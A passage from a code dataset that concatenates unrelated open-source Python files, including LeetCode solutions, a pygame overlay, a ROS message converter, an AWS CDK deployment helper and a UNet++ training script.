w.to_file(newPicPath)\n\n\nif __name__ == '__main__':\n # 用户输入 准备数据\n print(\"有爱的词图:\\n\")\n pics = os.listdir(\"pic\")\n data = os.listdir(\"data\")\n try:\n pics.remove(\".DS_Store\")\n data.remove(\".DS_Store\")\n except:\n pass\n for i in range(len(pics)):\n img_path = os.path.join(\"pic\", pics[i])\n pics[i] = img_path\n print(f'{i} {img_path}')\n img_no = input(\"请输入背景图序号(无输入直接enter,将使用默认值 0):\")\n for i in range(len(data)):\n dataPath = os.path.join(\"data\", data[i])\n data[i] = dataPath\n print(f'{i} {dataPath}')\n chat_no = input(\"请输入选择的聊天记录(无输入直接enter,将使用默认值 0):\")\n maxWords = input(\"请输入最多填充词量,整数(无输入直接enter,将使用默认值 200):\")\n newPicName = input(\"请输入新图片名称(无输入直接enter,将使用默认值):\")\n img_no = img_no if img_no else 0\n chat_no = chat_no if chat_no else 0\n maxWords = int(maxWords) if maxWords else 200\n bgpicPath = pics[int(img_no)]\n chatPath = data[int(chat_no)]\n if not newPicName:\n newPicName = \"{}_{}_{}.jpg\".format(os.path.split(chatPath)[1].split(\".\")[0],\n os.path.split(bgpicPath)[1].split(\".\")[0], maxWords)\n newPicPath = f'resultpic/{newPicName}'\n # 调用函数\n chineseStr = getChineseStr(chatPath)\n allwordslist = splitWord(chineseStr)\n genWordCloud(allwordslist, bgpicPath, newPicPath, maxWords)\n print(\"词云图片生成:\", os.path.join(PRO_PATH, newPicPath))\n\n\n\n\n\n\n","repo_name":"freecatling/petshelter","sub_path":"wordcloud/picus.py","file_name":"picus.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8223828936","text":"\n#https://leetcode.com/problems/top-k-frequent-elements/\n\nfrom collections import Counter\nimport heapq\n\nclass Solution:\n def topk(self, nums, k):\n \n count=Counter(nums)\n # return [ i for i, j in count.most_common(k)]\n # return heapq.nlargest(k, count.keys(), key=count.get) \n # return [item_id for item_id, count in sorted(count.items(), key=lambda why:-why[1])[:k]]\n\n heap = []\n for item_id, count in count.items():\n heapq.heappush(heap, (count, item_id))\n if len(heap) > k:\n heapq.heappop(heap)\n return [item_id for count, item_id in heap]\n \n\n\nnums = [1,1,1,2,2,5,5,3,5,5,5]\nk = 2\na=Solution()\nprint(a.topk(nums,k))","repo_name":"cosmo9873/practice","sub_path":"meta/top-k.py","file_name":"top-k.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10218125084","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\n\nclass Drawer(object):\n def __init__(self):\n fig = plt.figure()\n self.ax = fig.add_subplot(111, projection='3d')\n plt.ion()\n plt.show()\n\n self.counter = 0\n\n def plot(self, x, y, z, traj_x=[], traj_y=[], traj_z=[]):\n self.counter += 1\n if not self.counter % 10:\n return\n\n # self.ax.cle\n self.ax.plot([-5, 5], [-5, 5], [-5, 5], '.')\n self.ax.plot(traj_x, traj_y, traj_z, '-')\n self.ax.plot([x], [y], [z], 'o')\n plt.draw()\n plt.pause(0.00001)\n self.ax.cla()\n","repo_name":"dsaldana/modquad-simulator","sub_path":"modquad_simulator/src/modsim/plot/drawer_matplot.py","file_name":"drawer_matplot.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40285298811","text":"from typing import List\n\nfrom test_framework import generic_test\nfrom collections import defaultdict\n\n\n# Check if a partially filled matrix has any conflicts.\ndef is_valid_sudoku(partial_assignment: List[List[int]]) -> bool:\n r_dict, c_dict, s_dict = defaultdict(set), defaultdict(set), defaultdict(set)\n rows, cols = len(partial_assignment), len(partial_assignment[0])\n mul_ = 0\n for row in range(rows):\n if row % 3 == 0:\n mul_ = row\n for col in range(cols):\n value = partial_assignment[row][col]\n if value != 0:\n if (value in r_dict[row]) or (value in c_dict[col]) or (value in s_dict[mul_ + col // 3]):\n return False\n r_dict[row].add(value)\n c_dict[col].add(value)\n s_dict[mul_ + col // 3].add(value)\n\n return True\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('is_valid_sudoku.py',\n 'is_valid_sudoku.tsv', is_valid_sudoku))\n","repo_name":"leon1114/Elements_of_Programming_Interviews","sub_path":"epi_judge_python/is_valid_sudoku.py","file_name":"is_valid_sudoku.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37286120788","text":"#\n# @lc app=leetcode id=6916 lang=python3\n#\n# [6916] Prime Pairs With Target Sum\n#\n\n# @lc code=start\nclass Solution:\n def findPrimePairs(self, n: int) -> List[List[int]]:\n\n prime = [False, False] + [True] * (n - 1)\n for i in range(2, n + 1):\n if prime[i]:\n for j in range(i * i, n + 1, i):\n prime[j] = False\n\n return [[i, n - i] for i in range(2, n // 2 + 1) if prime[i] and prime[n - i]]\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"6916.prime-pairs-with-target-sum.py","file_name":"6916.prime-pairs-with-target-sum.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1980007977","text":"import pygame\nfrom settings import *\nfrom support import import_folder,import_folder_dict\n\nclass Overlay:\n def __init__(self,player):\n \n # general setup\n self.display_surface = pygame.display.get_surface()\n self.player = player\n\n # import\n overlay_path = '../graphics/overlay/'\n self.tools_surf = {tool: pygame.image.load(f'{overlay_path}{tool}.png').convert_alpha() for tool in player.tools}\n self.seeds_surf = {seed: pygame.image.load(f'{overlay_path}{seed}.png').convert_alpha() for seed in player.seeds}\n\n self.dialog_surf = pygame.image.load('../graphics/ui/dialog.png').convert_alpha()\n self.dialog_surf.set_colorkey((255,255,255))\n\n # 导入表情图片\n self.emotions = {\n '0':[],'1':[],'2':[],'3':[],'4':[],'5':[],'6':[]\n }\n for emotion in self.emotions.keys():\n full_path='../graphics/ui/emotion/' + emotion\n self.emotions[emotion]=import_folder(full_path)\n\n self.emotion_index = 0\n self.frame_index = 0\n\n # 导入工具栏盒子\n self.box_surf = pygame.image.load('../graphics/overlay/box.png').convert_alpha()\n self.box_surf = pygame.transform.scale(self.box_surf,(128,128))\n\n # 导入展示框\n self.board_surf =pygame.image.load('../graphics/overlay/board.png').convert_alpha()\n self.board_surf = pygame.transform.scale(self.board_surf,(128,128))\n\n # 导入物品图片\n self.items = import_folder_dict('../graphics/ui/item')\n\n # 导入字体\n self.f = pygame.font.Font('../font/ZiTiGuanJiaFangMeng-2.ttf',50)\n self.f2 = pygame.font.Font('../font/LycheeSoda.ttf',30)\n self.f3 = pygame.font.Font('../font/ZiTiGuanJiaFangMeng-2.ttf',25)\n\n self.tips_surfs = [\n self.f3.render('W A S D 移动',True,(255,255,255)),\n self.f3.render('Q 切换工具',True,(255,255,255)),\n self.f3.render('E 切换种子',True,(255,255,255)),\n self.f3.render('空格 使用工具',True,(255,255,255)),\n self.f3.render('P 播种',True,(255,255,255)),\n self.f3.render('Enter 交互',True,(255,255,255))\n ]\n\n \n\n def display(self,days,dt,item,seed_num,seed):\n self.days = days\n # 展示工具栏\n box_rect1 = self.box_surf.get_rect(midbottom = OVERLAY_POSITIONS['box1'])\n box_rect2 = self.box_surf.get_rect(midbottom = OVERLAY_POSITIONS['box2'])\n self.display_surface.blit(self.box_surf,box_rect1)\n self.display_surface.blit(self.box_surf,box_rect2)\n # show tools\n tool_surf = self.tools_surf[self.player.selected_tool]\n tool_rect = tool_surf.get_rect(midbottom = OVERLAY_POSITIONS['tool'])\n self.display_surface.blit(tool_surf , tool_rect)\n # show seeds\n seed_surf = self.seeds_surf[self.player.selected_seed]\n seed_surf = pygame.transform.scale(seed_surf,(64,64))\n seed_rect = seed_surf.get_rect(midbottom = OVERLAY_POSITIONS['seed'])\n self.display_surface.blit( seed_surf, seed_rect)\n\n # show展示框\n board_rect = self.box_surf.get_rect(midbottom = OVERLAY_POSITIONS['board'])\n self.display_surface.blit(self.board_surf,board_rect)\n\n # 展示物品数量\n i = 1\n for item_surf in self.items.values():\n item_surf = pygame.transform.scale(item_surf,(20,20))\n item_rect = item_surf.get_rect(midbottom = OVERLAY_POSITIONS['item'+str(i)])\n i+=1\n self.display_surface.blit(item_surf,item_rect)\n\n i_surf = self.f2.render(f'{item[0]} {item[1]} {item[2]}',True,(0,0,0))\n i_rect = i_surf.get_rect(midbottom = (80,265))\n self.display_surface.blit(i_surf,i_rect)\n\n #展示种子数量\n seed_num_surf = self.f2.render(f'{seed_num[seed]}',True,(0,0,0))\n seed_num_rect = seed_num_surf.get_rect(midbottom = (175,SCREEN_HEIGHT-20))\n self.display_surface.blit(seed_num_surf,seed_num_rect)\n\n # 展示对话框\n dialog_surf = pygame.transform.scale(self.dialog_surf,(352,128))\n dialog_rect = self.dialog_surf.get_rect(midbottom = OVERLAY_POSITIONS['dialog'])\n self.display_surface.blit(dialog_surf,dialog_rect)\n\n # 天数展示\n day_surf = self.f.render(f'第 {self.days} 天',True,(255,255,255))\n day_rect = day_surf.get_rect(midbottom = (236,115))\n self.display_surface.blit(day_surf,day_rect)\n \n # 不同天展示不同的表情\n self.emotion_index = str(self.days % 7)\n\n self.frame_index += 4*dt\n if self.frame_index>=len(self.emotions[self.emotion_index]):\n self.frame_index=0\n emotion_surf = self.emotions[self.emotion_index][int(self.frame_index)]\n emotion_surf = pygame.transform.scale(emotion_surf,(64,64))\n emotion_rect = emotion_surf.get_rect(midbottom = OVERLAY_POSITIONS['emotion'])\n self.display_surface.blit(emotion_surf,emotion_rect)\n\n # 展示提示\n for tip_index,tip_surf in enumerate(self.tips_surfs):\n tip_rect = self.tips_surfs[tip_index].get_rect(topleft = (20,280 + 25 * tip_index))\n self.display_surface.blit(tip_surf,tip_rect)","repo_name":"Nine9J/Sprout-Lands","sub_path":"code/overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24840919264","text":"#!/c/Users/vadim/AppData/Local/Programs/Python/Python37-32/python\n# -*- coding: utf-8 -*-\n#\n# a module for natural language processing\n\nimport re\n\ntrash = ('-', \\\n\t'and', 'are', \\\n\t'for', 'from', \\\n\t'her', 'hers', 'him', 'his', 'how', \\\n\t'its', 'into', \\\n\t'over', \\\n\t'she', \\\n\t'the', 'they', 'them', 'their', 'through', \\\n\t'via', \\\n\t'with', \\\n\t'you', 'your', 'yours' \\\n\t)\n# 19210 stems found.\n\nnosplit = (\\\n\t'JastAdd', \\\n\t'JavaScript', \\\n\t'MontiCore', \\\n\t)\n\nnofilter = (\\\n\t'ad', \\\n\t'be', \\\n\t'do', \\\n\t'go', \\\n\t'id', \\\n\t'ml', \\\n\t'no', \\\n\t'tv', \\\n\t'ui', \\\n\t'up', \\\n\t)\n\nnrs = {'1st': 'First', '2nd': 'Second', '3rd': 'Third', '1th': 'First', '2th': 'Second', \\\n'3th': 'Third', '4th': 'Fourth', '5th': 'Fifth', '6th': 'Sixth', '7th': 'Seventh', \\\n'8th': 'Eighth', '9th': 'Ninth', 'Tenth': '10th', 'Eleventh': '11th', 'Twelfth': '12th', \\\n'Thirteenth': '13th', 'Fourteenth': '14th', 'Fifteenth': '15th', 'Sixteenth': '16th', \\\n'Seventeenth': '17th', 'Eighteenth': '18th', 'Nineteenth': '19th', 'Twentieth': '20th'}\n\ndef strictstrip(s):\n\ts = s.strip()\n\tif s.endswith(','):\n\t\ts = s[:-1]\n\treturn s\n\ndef shorten(n):\n\t# print('SHORTEN[{}]'.format(n))\n\tws = n.strip().split(' ')\n\tif len(ws) == 1:\n\t\treturn n\n\treturn '.'.join([w[0] for w in ws[:-1]]) + '.' + ws[-1]\n\ndef baretext(s):\n\ts = s.strip().lower()\n\tfor tag in ('i', 'sub', 'sup'):\n\t\ts = s.replace('<'+tag+'>', '')\n\t\ts = s.replace('', '')\n\treturn s\n\ndef superbaretext(s):\n\tfor x in '},.:!?;./\\\\“”‘’–—_=@$%^&()[]§±`~<>|\\'#+1234567890{':\n\t\ts = s.replace(x, ' ')\n\twhile s.find(' ') > -1:\n\t\ts = s.replace(' ', ' ')\n\treturn s.strip()\n\ndef heurichoose(k, v1, v2):\n\tif k == 'title':\n\t\t# title without spaces if bad\n\t\tif v1.find(' ') < 0 and v2.find(' ') >= 0:\n\t\t\treturn v2\n\t\tif v2.find(' ') < 0 and v1.find(' ') >= 0:\n\t\t\treturn v1\n\t\t# proceedings are always good\n\t\tif v1.startswith('Proceedings') and not v2.startswith('Proceedings'):\n\t\t\treturn v1\n\t\tif v2.startswith('Proceedings') and not v1.startswith('Proceedings'):\n\t\t\treturn v2\n\t\tif v1.startswith('Proceedings') and v2.startswith('Proceedings'):\n\t\t\tif v1.count(',') > v2.count(','):\n\t\t\t\treturn v2\n\t\t\telse:\n\t\t\t\treturn v1\n\tif k == 'year':\n\t\t# updated year always gets precedence\n\t\treturn v1\n\t# print('{}: {} vs {}'.format(C.red('\\tUndecided ' + k), v1, v2))\n\t# if undecided, stick to the old one\n\treturn v2\n\ngreek = ['µ', 'ᗺ', '’¬', 'ℬ', 'ℰ', 'ℒ', 'ℋ', '𝒜', 'ℓ', 'ᴾ', 'ᵂ', 'ϵ'] + \\\n\t[chr(x) for x in range(ord('α'), ord('ω')+1)]\n\n# Works almost like .split() but much stricter:\n# \t- saves only proper letters\n# \t- treats any other symbol as a words separator\n# \t- converts words to lower case\n#\t- tries to break CamelCase, CamelTAIL and HEADCamel (no CamelMIDCase)\n# \t- resists the temptation to treat ABBRs as HEADCamel\ndef string2words(s):\n\tws = ['']\n\tfor c in s:\n\t\tif c.isalpha() and c not in greek:\n\t\t\tws[-1] += c\n\t\telif ws[-1] != '':\n\t\t\tws.append('')\n\tif ws[-1] == '':\n\t\tws = ws[:-1]\n\tws2 = []\n\tfor w in ws:\n\t\tif w[-1] == 's' and w[:-1].isupper():\n\t\t\t# corner case: DAGs, NDAs, APIs, etc\n\t\t\tws2.append(w)\n\t\t\tcontinue\n\t\tif re.match('^[A-Z]+to[A-Z]+', w):\n\t\t\t# corner case: XXXtoYYY\n\t\t\tuc = re.findall('[A-Z]+', w)\n\t\t\tws2.append(uc[0])\n\t\t\tws2.append('to')\n\t\t\tws2.append(uc[1])\n\t\t\tcontinue\n\t\tccws = re.findall('[A-Z][a-z]+', w)\n\t\trecon = ''.join(ccws)\n\t\tif w not in nosplit and len(ccws) > 1 and recon == w:\n\t\t\t# primary case: a word cleanly split into words\n\t\t\t# print('[ CC ]', w, '->', ' ++ '.join(ccws))\n\t\t\tws2.extend(ccws)\n\t\telif w.endswith(recon) and re.match('^[A-Z]+$', w[:-len(recon)]):\n\t\t\t# corner case: starts with an abbreviation, continues to camel\n\t\t\t# print('[ CC ]', w, '->', w[:-len(recon)], '±±', ' ++ '.join(ccws))\n\t\t\tws2.append(w[:-len(recon)])\n\t\t\tws2.extend(ccws)\n\t\telif w.startswith(recon) and re.match('^[A-Z]+$', w[len(recon):]):\n\t\t\t# corner case: starts with a camel, ends with an abbreviation\n\t\t\t# print('[ CC ]', w, '->', ' ++ '.join(ccws), '±±', w[len(recon):])\n\t\t\tws2.extend(ccws)\n\t\t\tws2.append(w[len(recon):])\n\t\telse:\n\t\t\tws2.append(w)\n\treturn [w.lower() for w in ws2] # if w.lower() not in trash or w.lower() in nofilter]\n\ndef ifIgnored(w):\n\treturn not ifApproved(w)\n\ndef ifApproved(w):\n\treturn w in nofilter or (w not in trash and len(w) > 2)\n","repo_name":"bibtex/bibsleigh","sub_path":"lib/NLP.py","file_name":"NLP.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33322637218","text":"from pathlib import Path\n\nfrom nonebot.adapters.onebot.v11 import Message, MessageSegment\nfrom nonebot.params import CommandArg\nfrom PIL import Image\n\nfrom util import command, imutil, misc, textutil\n\nDIR = Path(__file__).resolve().parent\n\n\nwujing = (\n command.CommandBuilder(\"meme_word.wujing\", \"吴京\")\n .category(\"meme_word\")\n .usage(\"/吴京 <文本>\\n必须包含“中国”两字\")\n .build()\n)\n@wujing.handle()\nasync def handle_wujing(args: Message = CommandArg()):\n text = args.extract_plain_text()\n try:\n i = text.index(\"中国\")\n except ValueError:\n await wujing.finish(wujing.__doc__)\n\n def make() -> MessageSegment:\n left = text[:i].rsplit(None, 1)\n right = text[i + 2:].split(None, 1)\n im = Image.open(DIR / \"template.jpg\")\n if len(left) == 2:\n left1_im = textutil.render(left[-2], \"sans\", 85, color=(255, 255, 255), align=\"l\")\n left1_im = imutil.contain_down(left1_im, 837, 130)\n imutil.paste(im, left1_im, (50, 485), anchor=\"lm\")\n if left:\n left2_im = textutil.render(left[-1], \"sans\", 85, color=(255, 255, 255), align=\"r\")\n left2_im = imutil.contain_down(left2_im, 330, 130)\n imutil.paste(im, left2_im, (350, 625), anchor=\"rm\")\n if right:\n right1_im = textutil.render(right[0], \"sans\", 85, color=(255, 255, 255), align=\"l\")\n right1_im = imutil.contain_down(right1_im, 307, 130)\n imutil.paste(im, right1_im, (610, 605), anchor=\"lm\")\n if len(right) == 2:\n right2_im = textutil.render(right[1], \"sans\", 85, color=(255, 255, 255), align=\"r\")\n right2_im = imutil.contain_down(right2_im, 837, 130)\n imutil.paste(im, right2_im, (887, 745), anchor=\"rm\")\n return imutil.to_segment(im)\n\n await wujing.finish(await misc.to_thread(make))\n","repo_name":"su226/IdhagnBot","sub_path":"plugins/meme_word/wujing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"41923215422","text":"import argparse\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom pathlib import Path\n\nfrom catkin_pkg.package import parse_package\n\nsys.path.append(os.path.dirname(__file__))\n\nfrom rosidl_adapter.msg import convert_msg_to_idl\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"package_dirs\", nargs=\"*\")\n parser.add_argument(\"-o\", \"--outdir\", required=True)\n args = parser.parse_args(sys.argv[1:])\n\n with tempfile.TemporaryDirectory() as tmp:\n tmp = Path(tmp)\n tmp_idl = tmp / \"idl\"\n tmp_cxx = tmp / \"cxx\"\n\n for pkg_dir in args.package_dirs:\n pkg_dir = Path(pkg_dir).absolute()\n pkg = parse_package(pkg_dir)\n for msg in pkg_dir.glob(\"**/*.msg\"):\n convert_msg_to_idl(\n pkg_dir,\n pkg.name,\n msg.relative_to(pkg_dir),\n tmp_idl / pkg.name / msg.parent.relative_to(pkg_dir),\n )\n\n for idl in tmp_idl.glob(\"**/*.idl\"):\n dest = tmp_cxx / idl.parent.relative_to(tmp_idl)\n dest.mkdir(parents=True, exist_ok=True)\n subprocess.run(\n [\n \"fastddsgen\",\n \"-typeros2\",\n \"-cs\",\n \"-I\",\n tmp_idl,\n \"-d\",\n dest,\n idl,\n ],\n )\n\n out_dir = Path(args.outdir)\n out_dir.mkdir(parents=True, exist_ok=True)\n shutil.copytree(tmp_cxx, out_dir, dirs_exist_ok=True)\n","repo_name":"eyr1n/msg2fastdds","sub_path":"src/msg2fastdds/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33131418568","text":"from aws_cdk.aws_ec2 import UserData\r\nfrom utils.user_data_construction_utils import LocalAssetCreator\r\nfrom utils.user_data_construction_utils import AWSCliInstallationAttacher\r\nfrom deployment_asset.deployment_asset_stack_constructor import DeploymentAssetStack\r\nfrom aws_cdk.aws_ec2 import Instance\r\nfrom master.master_stack_constructor import MasterStack\r\n\r\n\r\nclass ManagerUserDataConstructor:\r\n def __init__(\r\n self,\r\n config: dict,\r\n master_stack: MasterStack,\r\n deployment_asset_stack: DeploymentAssetStack,\r\n\r\n instance: Instance\r\n ):\r\n self.__number_of_worker = config[\"NUMBER_OF_WORKER\"]\r\n self.__master_private_ip = master_stack.master_instance.instance_private_ip\r\n\r\n self.__user_data = UserData.for_linux()\r\n self.__local_asset_creator = LocalAssetCreator(user_data=self.__user_data, instance=instance)\r\n\r\n self.__deploy_manager_script_asset = deployment_asset_stack.deploy_manager_script_asset\r\n self.__public_key_asset = deployment_asset_stack.public_key_asset\r\n self.__create_user_script_asset = deployment_asset_stack.create_user_script_asset\r\n self.__check_master_ready_script_asset = deployment_asset_stack.check_master_ready_script_asset\r\n self.__private_key_asset = deployment_asset_stack.private_key_asset\r\n\r\n self.__rook_pod_security_policy_asset = deployment_asset_stack.rook_pod_security_policy_asset\r\n self.__ceph_file_system_asset = deployment_asset_stack.ceph_file_system_asset\r\n self.__storage_class_asset = deployment_asset_stack.storage_class_asset\r\n\r\n def execute(self):\r\n AWSCliInstallationAttacher(self.__user_data).execute()\r\n\r\n local_deploy_manager_script = self.__local_asset_creator.execute(self.__deploy_manager_script_asset)\r\n\r\n local_public_key = self.__local_asset_creator.execute(self.__public_key_asset)\r\n local_create_user_script = self.__local_asset_creator.execute(self.__create_user_script_asset)\r\n local_check_master_ready_script = self.__local_asset_creator.execute(self.__check_master_ready_script_asset)\r\n local_private_key = self.__local_asset_creator.execute(self.__private_key_asset)\r\n local_rook_pod_security_policy = self.__local_asset_creator.execute(self.__rook_pod_security_policy_asset)\r\n local_ceph_file_system = self.__local_asset_creator.execute(self.__ceph_file_system_asset)\r\n local_storage_class = self.__local_asset_creator.execute(self.__storage_class_asset)\r\n\r\n self.__user_data.add_execute_file_command(\r\n file_path=local_deploy_manager_script,\r\n arguments=\"{} {} {} {} {} {} {} {} {} &\".format(\r\n local_public_key,\r\n local_create_user_script,\r\n local_check_master_ready_script,\r\n self.__master_private_ip,\r\n local_private_key,\r\n local_rook_pod_security_policy,\r\n local_ceph_file_system,\r\n local_storage_class,\r\n self.__number_of_worker\r\n )\r\n )\r\n\r\n return self.__user_data\r\n","repo_name":"HallBlazzar/kubeadm-CDK","sub_path":"manager/user_data_constructor.py","file_name":"user_data_constructor.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17539347360","text":"\"\"\"\nCS50 Python -- Meal Time --\n\nThis is the first set of assignments from CS50 Python course on Edx: the link to the full description of this\nproblemset is in the following link.\n\nhttps://cs50.harvard.edu/python/2022/psets/1/meal/\n\n---------------------DESCRIPTION--------------------------\nIn a file called interpreter.py, impement a program that promts the user for an arithmetic expression\nand then calculates and outputs the result as a floating point value\nformatted to one decimal place. Assume that the user's input will be formatter as x y z, with one space\nbetween x and y and one space between y and z, wherein:\n\"\"\"\n\ndef main():\n tm = input(\"Input the time in the following format ##:## : \")\n hrs, mins = tm.split(\":\")\n hrs = int(hrs)\n if 7 <= hrs <= 8:\n print(\"breakfast time\")\n elif 12 <= hrs <= 13:\n print(\"lunch time\")\n elif 18 <= 19:\n print(\"dinner time\")\n else:\n print(\"\")\n\n\n\n# def convert(time):\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ejaramillo1/python-learning","sub_path":"CS50_Python/Week1 - Conditionals/pset1/meal/meal.py","file_name":"meal.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20835985311","text":"import sys\nimport os\nimport argparse\nimport time\nfrom optparse import OptionParser\nimport numpy as np\nimport pdb\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torch.utils.tensorboard import SummaryWriter\nimport shutil\nfrom eval import eval_net\nfrom unet import NestedUNet,UNet\nfrom utils import get_ids, split_ids, split_train_val, get_imgs_and_masks, batch, iou_score\nfrom tqdm import tqdm\n\n\n\n####### set directory ###########\n##### 1. for tensorboard ###\ndirectory = 'runs/avoidDump' \nct = time.localtime(time.time())\ndirectory = os.path.join(directory, \"%04d-%02d-%02d, %02d:%02d:%02d_bce+dice/\" %\n (ct.tm_year, ct.tm_mon, ct.tm_mday, ct.tm_hour, ct.tm_min, ct.tm_sec))\nif not os.path.exists(directory):\n os.makedirs(directory)\nwriter = SummaryWriter(directory)\n\n#### 2. save model #####\ndir_model = 'fullmodel/avoidDump'\nif not os.path.exists(dir_model):\n os.makedirs(dir_model)\n\nbest_dice = 0\nbest_loss = 10\n##################################\n\n\n\ndef train_net(args,\n net,\n epochs,\n batch_size=1,\n lr=0.1,\n val_percent=0.05,\n save_cp=True,\n gpu=False,\n img_scale=0.5):\n\n global best_dice, best_loss\n dir_img = '/home/mori/Programming/Net_Pruning/unetdataset_patchImg/img/'\n dir_mask = '/home/mori/Programming/Net_Pruning/unetdataset_patchImg/graylabel/'\n\n\n ids = get_ids(dir_img) # get file name (without .png)\n print(\"ids:{}\".format(ids))\n \n ids = split_ids(ids) # 重采样?\n print(\"ids:{}\".format(ids))\n iddataset = split_train_val(ids, val_percent) # 按给定比例划分打乱的数据集\n\n ###### count parameters ############\n paras = sum([p.data.nelement() for p in net.parameters()]) \n\n print('''\n Starting training:\n Epochs: {}\n Parameters: {}\n Batch size: {}\n Learning rate: {}\n Training size: {}\n Validation size: {}\n Checkpoints: {}\n CUDA: {}\n Deepsupervision: {}\n '''.format(epochs, paras, batch_size, lr, len(iddataset['train']),\n len(iddataset['val']), str(save_cp), str(gpu),str(args.deepsupervision)))\n\n N_train = len(iddataset['train'])\n print(\"N_train:{}\".format(N_train))\n optimizer = optim.SGD(net.parameters(),\n lr=lr,\n momentum=0.9,\n weight_decay=0.0005)\n\n criterion = nn.BCELoss()\n\n for epoch in range(epochs):\n print('Starting epoch {}/{}.'.format(epoch + 1, epochs))\n net.train()\n\n New_lr=adjust_learning_rate(optimizer, epoch,epochs)\n print(' lr: {}'.format(New_lr))\n # reset the generators\n train = get_imgs_and_masks(iddataset['train'], dir_img, dir_mask, img_scale)\n val = get_imgs_and_masks(iddataset['val'], dir_img, dir_mask, img_scale)\n\n best_iou = 0\n epoch_loss = 0\n\n for i, b in enumerate(batch(train, batch_size)): # 手动分出batch\n imgs = np.array([i[0] for i in b]).astype(np.float32)\n true_masks = np.array([i[1] for i in b])\n\n imgs = torch.from_numpy(imgs)\n true_masks = torch.from_numpy(true_masks)\n\n if gpu:\n imgs = imgs.cuda()\n true_masks = true_masks.cuda()\n\n true_masks_flat = true_masks.view(-1)\n true_masks_flat = true_masks_flat/255 # 归一化\n \n output = net(imgs)\n masks_pred = F.sigmoid(output)\n\n if args.deepsupervision:\n #### unet++ with deepsupervision\n loss = 0\n for mp in masks_pred:\n masks_probs_flat = mp.view(-1)\n loss += criterion(masks_probs_flat, true_masks_flat)\n loss /= len(masks_pred)\n epoch_loss += loss.item()\n else: \n masks_probs_flat = masks_pred.view(-1)\n loss = criterion(masks_probs_flat, true_masks_flat)\n epoch_loss += loss.item()\n\n ## todo: adjust iou \n iou = iou_score(output, true_masks/255)\n\n ######## record the best iou\n if iou > best_iou:\n best_iou = iou\n\n print('{0:.4f} --- loss: {1:.6f}'.format(i * batch_size / N_train, loss.item()))\n \n newloss=loss.item()\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n print('Epoch finished ! Loss: {}'.format(epoch_loss / i))\n print('Best iou: {}'.format(best_iou))\n val_dice = eval_net(net, val, gpu)\n print('Validation Dice Coeff: {}'.format(val_dice))\n\n writer.add_scalar('train_loss',epoch_loss/i,(epoch+1))\n writer.add_scalar('val_dice', val_dice, (epoch+1))\n writer.add_scalar('best iou', best_iou, (epoch+1))\n\n\n if save_cp:\n #torch.save(net.state_dict(),dir_checkpoint + 'CP{}.pth'.format(epoch + 1))\n #print('Checkpoint {} saved !'.format(epoch + 1))\n dice_best = val_dice > best_dice\n loss_best = epoch_loss / i < best_loss\n best_dice = max(val_dice, best_dice)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': net.state_dict(),\n 'best_dice': best_dice,\n 'best_loss': best_loss, \n }, dice_best, loss_best)\n \n print('Best dice: ', best_dice)\n\n \ndef adjust_learning_rate(optimizer, epoch,epochs):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 after 150 and 225 epochs\"\"\"\n # lr = args.lr * (0.1 ** (epoch // (20+epochs*0.1+0.12*epoch))*(4**((epoch // (20+epochs*0.1+0.12*epoch))//3)))\n if epoch<=int(epochs*0.2):\n lr = args.lr\n elif epoch>int(epochs*0.2) and epoch<=int(epochs*0.35):\n lr = args.lr*0.1*3\n elif epoch>int(epochs*0.35) and epoch<=int(epochs*0.5):\n lr = args.lr*0.1\n elif epoch>int(epochs*0.5) and epoch<=int(epochs*0.65):\n lr = args.lr*0.01*3\n elif epoch>int(epochs*0.65) and epoch<=int(epochs*0.8):\n lr = args.lr*0.01\n elif epoch>int(epochs*0.8) and epoch<=int(epochs*0.95):\n lr = args.lr*0.001*3\n elif epoch>int(epochs*0.95):\n lr = args.lr*0.001\n\n writer.add_scalar('learning_rate', lr, epoch)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr\n\n\ndef save_checkpoint(state, dice_best, loss_best, filename='checkpoint.pth'):\n \"\"\"Saves checkpoint to disk\"\"\"\n filename = directory + filename\n torch.save(state, filename)\n if dice_best:\n shutil.copyfile(filename,os.path.join(directory, 'dice_best.pth'))\n if loss_best:\n 